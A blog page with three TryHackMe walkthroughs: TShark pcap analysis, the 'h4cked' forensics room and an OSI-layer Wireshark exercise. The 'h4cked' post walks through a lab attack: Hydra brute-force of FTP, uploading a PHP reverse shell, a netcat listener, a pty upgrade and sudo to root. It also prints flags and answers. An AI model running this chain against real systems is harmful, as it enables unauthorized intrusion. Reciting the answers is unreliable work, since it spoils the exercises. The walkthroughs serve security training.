-->

ABOUT US

Our development agency is committed to providing you the best service.

OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major Security,Just need to Understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Techonology is the best way to Change Everything, like Mindset Goal.

OUR SKILLS

We pride ourselves with strong, flexible and top notch skills.

Marketing

Development 90%
Design 80%
Marketing 70%

Websites

Development 90%
Design 80%
Marketing 70%

PR

Development 90%
Design 80%
Marketing 70%

ACHIEVEMENTS

We help our clients integrate, analyze, and use their data to improve their business.

150

GREAT PROJECTS

300

HAPPY CLIENTS

650

COFFEES DRUNK

1568

FACEBOOK LIKES

STRATEGY & CREATIVITY

Phasellus iaculis dolor nec urna nullam. Vivamus mattis blandit porttitor nullam.

PORTFOLIO

We pride ourselves on bringing a fresh perspective and effective marketing to each project.

Showing posts with label wireshark. Show all posts
Showing posts with label wireshark. Show all posts
  • Learn how to use TShark to accelerate your pcap analysis!

     

     


     

    Tshark

     

    Bored with trying to extract packets by hand? Need to get info from a pcap file that doesn't extract easily from Wireshark? Are GUIs for losers but now you realized you can't open Wireshark? Well my friend, TShark is the solution to all your problems.

     

     

    Installation


    Before beginning, we need to make sure we have tshark installed on our host - If you are using the AttackBox you can skip this, as it already has tshark installed.



    Generally, tshark is installed with Wireshark. But let's verify it's installed anyway. Run the command below to determine if it's installed or not.



    apt list tshark



    In my output above, we can see that it is installed. If it's not installed, sudo apt install tshark will do the trick.

    The tshark program is also available in a Windows installation as tshark.exe in the Wireshark install directory.

    Try running tshark -h to get the help output to make sure we can access the program properly. 


     

     

    Download Capture File :- Click Here

    Download Capture File :- Click Here

     

     

    This task uses the dns.cap capture file on the Wireshark SampleCaptures wiki page.

    To read a file with TShark, we will use the -r switch. This will display a summary line of each packet similar to tcpdump output and is useful to identify high-level information about the capture.



    tshark -r dns.cap



    When paired with wc -l, we can quickly identify how many packets are in a capture.


    tshark -r dns.cap | wc -l




    We can utilize Wireshark display filters (which are DIFFERENT than bpf syntax) to narrow down what packets are displayed. If we're interested in DNS A records only, we can use the dns.qry.type == 1 display filter to narrow down our packets. Display filters are added using the -Y switch. Our command below will show all of the A records in our capture, including responses.



    tshark -r dns.cap -Y "dns.qry.type == 1"





    The power of TShark comes with combining traditional Wireshark filters with extraction. We can extract specific field values directly from the pcap, allowing us to have only the interesting fields returned. One way to extract data is using the -T fields and -e [fieldname] switches. To extract the A records in the pcap, we would use -T fields -e dns.qry.name at the end of our previous tshark command. This makes our command the one below:



    tshark -r dns.cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name

     

    NOTE: An easy way to identify field names in Wireshark is to navigate to the Packet Details in the capture, highlight the interesting field, then view the bottom left corner.

     

     


     

     

     


    1) How many packets are in the dns.cap file?


    Command :- tshark -r cap | wc -l

     

    Ans:- 38

     

     

     



     


     

     

    2) How many A records are in the capture? (Including responses)
     

    Command :- tshark -r cap -Y "dns.qry.type == 1"

     

    Ans:- 6






     

    3) Which A record was present the most?

    Command :- tshark -r cap -Y "dns.qry.type == 1" -T fields -e dns.qry.name

     

    Ans:- GRIMM.utelsystems.local

     

     






    File :- Pcap ( above the link )


    The following seven pillars constitute the foundation of this life-changing course:can you find it?



    Use the attached file to analyze in Wireshark and TShark to find the exfiltrated data. As you identify suspicious items in Wireshark, pivot to TShark to extract relevant information.



    Remember, we can filter out irrelevant packets with the -Y switch using display filters.





    1) How many packets are in this capture?


    Command :-  tshark -r pcap | wc -l

     

    Ans :- 125

     






     

     

     

    2) How many DNS queries are in this pcap? (Not responses!)


    Command :-  tshark -r pcap -Y "dns.flags.response == 0" | wc -l

    Ans :- 56






     

     

     

     

    3) What is the DNS transaction ID of the suspicious queries (in hex)?

    Command :- tshark -r pcap -Y "dns.qry.type == 1"

     

    Ans :- 0xbeef








     

    4) What is the string extracted from the DNS queries?

     

    Command :-  tshark -r pcap -Y "dns.qry.type == 1" | grep -v 'unreachable' | cut -d 'A' -f 2 | cut -d '.' -f 1


    MMZZWWGGCCZZ3333OORRUUDDCC442277NNFFZZVV6655BQQBOOV

    VTTWWQQXX33XXNNFF22GGQQMMDDVVGG55PPXXII4433IIGGRRZZ

    remove the duplicates (e.g. MM -> M, 3333 -> 33) leaves us with:


    Ans :- MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5







    5) What is the flag?

    Command

    echo "MZWGCZ33ORUDC427NFZV65BQOVTWQX3XNF2GQMDVG5PXI43IGRZGWIL5" | base32 -d
     

     

    Ans :- flag{th1s_is_t0ugh_with0u7_tsh4rk!}



     

    Optional for this post (wireshark) - Put http.request.method == "POST" in the display filter of wireshark to only show POST requests. Click on the packet, then expand the Hypertext Transfer Protocol field. The POST data will be right there on top.



    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)

     

  • TryHackMe h4cked walkthrough


    TryHackMe h4cked walkthrough

     

    The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

    TryHackMe h4cked walkthrough


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      


    It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.  TryHackMe h4cked walkthrough


    Let's Start 


    Downloading File Here :- Cick to download wireshark file


    2) The attacker is trying to log into a specific service. What service is this?

    When analyzing the pcap file, we can easily find out that attacker is trying to log into a FTP service as there are many requests and responses from FTP, as shown below.

     

     


     



    Ans :- FTP





    3) There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

    All you need to answer this question is Google search

     

     


     

     

     

    Ans:- Hydra





    4) The attacker is trying to log on with a specific username. What is the username?

    Simply type the service you found in the first question on Wireshark, and you will find the username that was used to login

     

     

     

     



    Ans :- jenny





    5) What is the user’s password?

    Search a packet that says “login successful” in the info, or you can follow a TCP STREAM of a connection that has ‘login successful’.


     

     
     
     



     

     

     Ans :- password123






    6) What is the current FTP working directory after the attacker logged in?


    We can see in the stream above that the PWD (present working directory) command was run. The response is “/var/www/html”.


      




     

     


    Ans :- /var/www/html





    7) The attacker uploaded a backdoor. What is the backdoor's filename?

    You can find the filename in the above TCP stream as “shell.php”


      


     


    Ans :- shell.php





    8) The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

    To answer this question you need to see the contents of the file that were uploaded. If you apply a display filter and only look at ftp-data you can see two streams. The first will be the directory listing, the second will be the STOR command (file upload).


    If you right-click and follow the second stream you will be able to view the contents of the file and answer the question.






     


    Ans :- http://pentestmonkey.net/tools/php-reverse-shell






    9) Which command did the attacker manually execute after getting a reverse shell?

    You just have to select a packet after executing the shell and follow TCP stream. There you can find all the commands executed by the attacker after getting the reverse shell. Thus, “whoami” is the first manual command executed by him.


     

     

     



    Ans :- whoami





    10) What is the computer’s hostname?

    When looking at the above TCP stream closely, the very first lines descrbes the OS , hostname etc. As Linux is the OS, “wir3” should be the hostname.


      


     


    Ans :- wir3





    11) Which command did the attacker execute to spawn a new TTY shell?

    Anyone with the experience of reverse shells know that we are given with an unstable shell in the first place. We need to make it stable. Most of the time we use a simple Python script to do so. We can see that this attacker also uses the same script when analyzing the above TCP stream.

    Check out Q10) number picture

    Ans:- python3 -c 'import pty; pty.spawn("/bin/bash")'





    12) Which command was executed to gain a root shell?

    The full sudo command that lets you become root user.


      



     

     



    Ans :- sudo su





    13) The attacker downloaded something from GitHub. What is the name of the GitHub project?

    We can see a git clone done by the attacker.(“Reptile” GitHub project). You just have to select a packet after executing the shell and follow TCP stream.


      

     

     



    Ans :- Reptile



    Wireshark in Networking



    Learn Wireshark :- Click Hee





    14) The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

    Follow the HINT


      


     



    Ans:- Rootkit





    Task-2



    1 ) Read the flag.txt file inside the Reptile directory

    There are some steps to get the flag.txt:


    • Step 1)


        Run Hydra to bruteforce the login to the FTP service:

        Type the command - 

     

    hydra -l jenny -P /home/hackerboy/Documents/rockyou.txt ftp://10.10.178.178

     
       
        -l – to use a specific user to login
        -P – the path to the file that contains the list of passwords to try and login





    • Step 2)


    Login to the FTP service using the credentials you found through Hydra. On the terminal just type "ftp 10.10.178.178" without double quotes and then provide the username and password you found when you bruteforce password using Hydra with username


    So, we are now successfully logged in as Jenny.







    • Step 3)


    Find the php reverse shell web shell in your Kali.
     

    locate php-reverse-shell.php







    • 4 Step)


    You can either edit the file in its location or copy it somewhere and edit the IP address(own machine IP address) and port number to set it up to get a reverse shell connection. I choose the edit first in own machine.






    • Step 5)


    Upload the web shell and change the permission with execute rights.

    In the FTP logged in session you are in, type
     

    put php-reverse-shell.php

    ls

    Now we need to change the web shell permission to make it executable, type

    chmod 777 php-reverse-shell.php

    ls

    as you can see, permissions are changed.









    • Step 6)


    let’s start a netcat listener before triggering the webshell, and so we will be able to catch a reverse shell.

    To start a netcat listener, make sure that you use the port number you entered when you edited the webshell in "Step 4", type

    nc -lnvp 1234


    Now, trigger the webshell in own browser by visiting the URL http://10.10.178.178/php-reverse-shell.php and hit enter

    Go back to your netcat listener to check if you have a reverse shell, it's a amazing let's celebtrate but wait we will take some more time.








    • Step 7)


    Switch to a more stable shell, by creating a new TTY shell, type 


    python3 -c 'import pty;pty.spawn("/bin/bash")'


    As for now, we are on “www-data”, which do not have root privileges. We know that Jenny has root privileges on the machine. So, let us change the user to Jenny and become root. It is so much simple as follows.


    su jenny

    password :- 987654321 (using step-1 Hydra)


    we are given a root shell without much effort.
     
    Type sudo -l to check what sudo privileges does user jenny currently have

      




    • Step 8)




    Type sudo su to change user as root and whoami to check if we successfully changed as root or not.

    Look for the /Reptile directory as it was indicated that flag.txt is in that location, type

    find / -type d -name Reptile 2> /dev/null

    Go to the location /root/Reptile and do cat flag.txt to retrieve the content of the flag.txt file









    Ans :- ebcefd66ca4b559d17b440b6e67fd0fd





    Disclaimer

     

    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


     



  • Wireshark Capture Network Traffic







    We've gone over the basic theory -- now let's put it into practice! In this task we're going to look at some captured network traffic to see the advantages of understanding the OSI and TCP/IP Models. Wireshark Capture Network  Traffic

    Wireshark is a tool used to capture and analyse packets of data going across a network.


    We're going to use Wireshark to get an idea of what these models look like in practice, with real world data.


    Download the attached .pcap file (Wireshark capture) and follow along!


    Click Here :- PCAP FIle 







    When you first load the packet into Wireshark you're given a list of captured data in the top window (there are two items in this window just now), and in the bottom two windows you're shown the data contained in each captured packet of data:






    Currently we're looking at the first packet, so let's have a look at the data in a little more detail:





    There are 5 pieces of information here:



    Frame 1 -- this is showing details from the physical layer of the OSI model (Network Interface layer of the TCP/IP model): the size of the packet received in terms of bytes)


    Ethernet II -- this is showing details from the Data Link layer of the OSI model (Network Interface layer of the TCP/IP model): the transmission medium (in this case an Ethernet cable), as well as the source and destination MAC addresses of the request.



    Internet Protocol Version 4 -- this is showing details from the Network layer of the OSI model (Internet Layer of the TCP/IP model): the source and destination IP addresses of the request.


    Transmission Control Protocol -- this is showing details from the Transport layer of the OSI and TCP/IP models: in this case it's telling us that the protocol was TCP, along with a few other things that we're not covering here.


    Hypertext Transfer Protocol -- this is showing details from the Application layer of the OSI and TCP/IP models: specifically, this is a HTTP GET request, which is requesting a web page from a remote server.


    This is not a Wireshark room, so we're not going to go into any more depth than that. The important thing is that you understand how the theory you learnt earlier translated into a real life scenario.


    With that in mind, click on the second captured packet (in the top window) and answer the following questions:



    #1 What is the protocol specified in the section of the request that's linked to the Application layer of the OSI and TCP/IP Models?

    Ans :- Domain name system



    #2 Which layer of the OSI model does the section that shows the IP address "172.16.16.77" link to (Name of the layer)?

    Ans :- Network



    #3 In the section of the request that links to the Transport layer of the OSI and TCP/IP models, which protocol is specified?

    Ans :- User Datagram Protocol



    #4 Over what medium has this request been made (linked to the Data Link layer of the OSI model)?

    Ans :- Etnernet II



    #5 Which layer of the OSI model does the section that shows the number of bytes transferred (81) link to?

    Ans :- Physical



    #6 [Research] Can you figure out what kind of address is shown in the layer linked to the Data Link layer of the OSI model?

    Ans :- MAC



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)


  • WHAT WE DO

    We've been developing corporate tailored services for clients for 30 years.

    CONTACT US

    For enquiries you can contact us in several different ways. Contact details are below.

    Hacking Truth.in

    • Street :Road Street 00
    • Person :Person
    • Phone :+045 123 755 755
    • Country :POLAND
    • Email :contact@heaven.com

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.

    Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation.